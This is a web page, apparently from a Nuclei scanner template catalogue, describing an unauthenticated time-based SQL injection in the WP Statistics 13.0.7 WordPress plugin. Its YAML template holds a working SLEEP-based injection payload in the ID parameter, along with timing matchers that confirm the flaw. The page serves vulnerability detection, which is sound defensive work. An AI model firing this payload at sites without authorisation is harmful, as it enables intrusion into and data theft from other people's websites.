Skip to content
Nuclei Templates

WordPress WP Statistics Plugin 13.0.7 - SQL Injection

ID: wp-statistics-sqli

Severity: high

Author: r3Y3r53

Tags: time-based-sqli,sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp

Description

Section titled “Description”

WordPress Plugin WP Statistics 13.0.7 contains an unauthenticated Time based SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: wp-statistics-sqli


info:
  name: WordPress WP Statistics Plugin 13.0.7 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    WordPress Plugin WP Statistics 13.0.7  contains an unauthenticated Time based SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.exploit-db.com/exploits/49894
    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-statistics-sql-injection-13-0-7/
    - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
    - https://wordpress.org/plugins/wp-statistics/
  classification:
    cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: veronalabs
    product: wp_statistics
    publicwww-query: /wp-content/plugins/wp-statistics/
  tags: time-based-sqli,sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp
flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        words:
          - 'WP Statistics'
        internal: true


  - raw:
      - |
        @timeout: 20s
        GET /wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(7))a) HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 500'
        condition: and
# digest: 4a0a00473045022100e8c92e31950b6abbd3ba9fe56e8f5ce6df4224aca7ffb60825d0c9e96a27792e022013ad505ffb6f37dd89d1001551757ecb3f573db23b23d9cec07e17fb7612bddd:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/wp-statistics-sqli.yaml"

View on Github